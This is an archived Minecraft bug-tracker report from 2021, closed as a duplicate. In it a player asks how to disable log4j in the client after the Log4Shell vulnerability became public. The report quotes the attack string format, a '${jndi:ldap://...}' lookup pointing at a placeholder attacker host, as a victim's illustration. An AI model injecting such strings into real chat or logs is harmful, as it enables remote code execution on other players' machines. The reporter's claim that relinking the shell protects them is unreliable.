Mojira Archive
MC-245103

Apache log4j Exploit on Minecraft Client

This exploit is well-known by now, please give me a solution to disable that freakin apache log4j, is there any java flags or anything else?? it does work, if i connect to a server, and someone throw out some of these stupid ${jndi:ldap://ipofhispcorvpn:port/exploitexecutionclass} codes in chat as well as i know it works on server (NMS uses log4j) IT ALSO WORKS ON CLIENT, SO HELP ME. AND ITS NOT ONLY THE CHAT, IF THE CODE JUST SENT ON MY LOGGER, AND I DON'T EVEN NOTICE IT, ITS DONE FOR ME, HELP ME PLS, thank you mojang, well but i am using arch linux and changed my symlink to bash, so it could help i don't get exploited, but HOW ABOUT PPL USING WINDOWS??

Duplicate

RiskerDegree87

2021-12-10, 01:47 PM

2021-12-10, 02:54 PM

2021-12-10, 02:54 PM

0

0

Unconfirmed

(Unassigned)

1.18.1

-